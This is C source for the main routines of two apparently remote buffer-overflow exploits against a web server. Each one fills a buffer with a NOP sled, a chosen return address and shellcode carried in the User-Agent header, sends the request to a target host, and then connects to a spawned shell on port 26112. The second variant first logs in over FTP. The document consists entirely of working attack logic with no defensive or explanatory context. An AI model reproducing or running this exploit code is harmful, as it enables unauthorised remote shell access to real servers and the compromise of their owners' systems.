int main(int argc,char *argv[]) { int port=D_PORT; char hostname[0x333]=D_HOST; int whlp,type=0; unsigned int i=0; char buf[BUFSIZE+1]; char buf2[BUFSIZE2+1]; char sendbuf[BUFSIZE3+1]; int sd; u_long retaddr=__pl_form[type].retaddr; (void)banrl(); while((whlp=getopt(argc,argv,"T:t:H:h:P:p:IiXx"))!=EOF) { extern char *optarg; switch(whlp) { case 'T': case 't': if((type=atoi(optarg))<6) { retaddr=__pl_form[type].retaddr; } else (void)x_fp_rm_usage(argv[0]); break; case 'H': case 'h': memset((char *)hostname,0,sizeof(hostname)); strncpy(hostname,optarg,sizeof(hostname)-1); break; case 'P': case 'p': port=atoi(optarg); break; case 'I': case 'i': fprintf(stderr," Try `%s -?' for more information.\n\n",argv[0]); exit(-1); case '?': (void)x_fp_rm_usage(argv[0]); break; } } if(!strcmp(hostname,D_HOST)) { (void)x_fp_rm_usage(argv[0]); } { fprintf(stdout," [+] Hostname: %s\n",hostname); fprintf(stdout," [+] Port num: %d\n",port); fprintf(stdout," [+] Retaddr address: %p\n",retaddr); } fprintf(stdout," [1] #1 Set codes.\n"); memset(buf, 0x90, BUFSIZE); memcpy(&buf[BUFSIZE-(sizeof(retaddr))], &retaddr, sizeof(retaddr)); memset(buf2,0x90,88); memcpy(buf2+88,shell, sizeof(shell)); snprintf(sendbuf,1024,"GET %s /HTTP/1.0\r\nUser-Agent: %s\r\n\r\n",buf,buf2); fprintf(stdout," [1] #1 Set socket.\n"); sd=sock_connect(hostname,port); fprintf(stdout," [1] #1 Send codes.\n"); write(sd,sendbuf,BUFSIZE3); close(sd); sleep(1); fprintf(stdout," [1] #3 Get shell.\n"); getshell(hostname,26112); exit(0); }
int main(int argc,char *argv[]) { int port=D_PORT; char hostname[0x333]=D_HOST; int whlp,type=0; unsigned int i=0; char buf[141]; char buf2[2078]; char sendbuf[3150]; char buf3[141]; int sd; int ftpsd; u_long retaddr=__pl_form[type].retaddr; (void)banrl(); while((whlp=getopt(argc,argv,"T:t:H:h:u:c:a:P:p:IiXx"))!=EOF) { extern char *optarg; switch(whlp) { case 'T': case 't': if((type=atoi(optarg))<6) { retaddr=__pl_form[type].retaddr; } else (void)x_fp_rm_usage(argv[0]); break; case 'H': case 'h': memset((char *)hostname,0,sizeof(hostname)); strncpy(hostname,optarg,sizeof(hostname)-1); break; case 'u': if(!user&&!(user=(char *)strdup(optarg))) printe("main(): allocating memory failed.",1); break; case 'a': if(!pass&&!(pass=(char *)strdup(optarg))) printe("main(): allocating memory failed.",1); break; case 'c': if(!writedir&&!(writedir=(char *)strdup(optarg))) printe("main(): allocating memory failed.",1); break; case 'P': case 'p': port=atoi(optarg); break; case 'I': case 'i': fprintf(stderr," Try `%s -?' for more information.\n\n",argv[0]); exit(-1); case '?': (void)x_fp_rm_usage(argv[0]); break; } } if(!strcmp(hostname,D_HOST)) { (void)x_fp_rm_usage(argv[0]); } else { fprintf(stdout," [+] Hostname: %s\n",hostname); fprintf(stdout," [+] Port num: %d\n",port); fprintf(stdout," [+] Retaddr address: %p\n",retaddr); } fprintf(stdout," [1] #1 Set codes.\n"); ftpsd=sock_connect(hostname,21); ftp_parse(ftpsd); memset(buf3,0x42,141); memset(buf2,0x90,1000); memcpy(buf2+1000,shell,strlen(shell)); memset(buf2+1000+strlen(shell),0x90,1000); snprintf(sendbuf,3150,"GET /%s/%s/%s/%s/%s/%s/%s/ HTTP/1.0\r\nUser-Agent: %s\r\n\r\n",buf3,buf3,buf3,buf3,buf3,buf3,buf3,buf2); fprintf(stdout," [1] #1 Set socket.\n"); sd=sock_connect(hostname,port); fprintf(stdout," [1] #1 Send codes.\n"); write(sd,sendbuf,3150); close(sd); sleep(10); fprintf(stdout," [1] #3 Get shell.\n"); getshell(hostname,26112); exit(0); }